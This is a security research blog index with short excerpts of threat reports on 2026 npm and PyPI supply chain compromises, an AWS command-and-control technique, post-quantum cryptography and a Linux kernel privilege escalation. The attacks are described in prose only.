Currently Browsing:

Research

Executive Summary On June 17 2026, a coordinated supply chain attack pushed a malicious easy-day-js package into the dependency tree of the entire @mastra/* npm organization. Any npm install for a compromised @mastra/* package pulls [email protected], which runs a postinstall dropper, downloads a cross-platform RAT, installing persistent backdoors on macOS, Linux, and Windows.  The Mastra […]

For most of the last decade, cloud security teams have lived by a simple slogan: encrypt everything. Encrypt at rest. Encrypt in transit. Use customer-managed keys. Rotate them. Pass the audit. Move on. That slogan just expired. In August 2024, NIST finalized the first three post-quantum cryptography (PQC) standards and explicitly told organizations: start using […]

Executive Summary On June 1, 2026, unauthorized commits were pushed to repositories in the RedHatInsights GitHub organization and used to publish malicious versions of 32 packages under the @redhat-cloud-services npm scope. The campaign, tracked as Miasma, executes a 4.2 MB obfuscated payload through an npm preinstall hook the moment any of these packages is installed, […]

A novel Command-and-Control (C2) channel weaponizes legitimate AWS services to establish two data channels, successfully circumventing one of the cloud’s strongest security defenses. Status: Infiltration Channel is FIXED, Exfiltration Channel is OPEN. TL;DR This research was presented at fwd:cloudsec North America 2026. Watch the full talk below. What Is the AWS Data Perimeter? For the […]

“You have to map the core logic and syntax of the system before you can find the interesting primitives.” This June 1st, Dan Gansel will walk on stage at fwd:cloudsec 2026 in North America to demonstrate a fully functional command-and-control channel that operates inside the AWS Data Perimeter, the cloud-native gold standard for keeping sensitive […]

Executive Summary Upwind identified a critical supply chain compromise involving durabletask==1.4.1, 1.4.2, and 1.4.3, three consecutive malicious releases of Microsoft’s Azure Durable Task Python SDK published to PyPI. The malicious release contains a lightweight dropper embedded directly into durabletask/init.py. On import, the package downloads and executes a remote payload named rope.pyz from attacker-controlled infrastructure. The […]

Executive Summary Upwind is tracking an active software supply chain campaign impacting multiple npm packages commonly used across developer tooling, frontend frameworks, CI/CD pipelines, and cloud-native application environments. We identified malicious payloads designed specifically to target CI/CD systems, cloud identities, GitHub credentials, npm publishing workflows, developer machines, and AI developer tooling. The campaign includes install-time […]

Executive Summary On May 14, 2026, malicious versions of the widely used node-ipc npm package were published through a legitimate maintainer account, introducing a sophisticated credential-stealing payload into a package with approximately 3.35 million monthly downloads. The malicious payload was hidden inside the CommonJS bundle (node-ipc.cjs) and silently executed whenever applications loaded the package through […]

Executive Summary A new wave of the Mini Shai-Hulud campaign compromised dozens of official @tanstack/* npm packages by abusing CI/CD publishing workflows and trusted npm release mechanisms. Unlike traditional dependency malware focused only on downstream execution, this operation behaves as a self-propagating supply chain worm designed to continuously spread across repositories, developer environments, and CI/CD […]

Executive Summary Dirty Frag is a new Linux kernel local privilege escalation that combines two kernel bugs – one in the IPsec subsystem and one in RxRPC, giving any unprivileged local user a root shell on every major distribution. The exploit is reliable and lasts until a reboot or cache fault Public PoC code has […]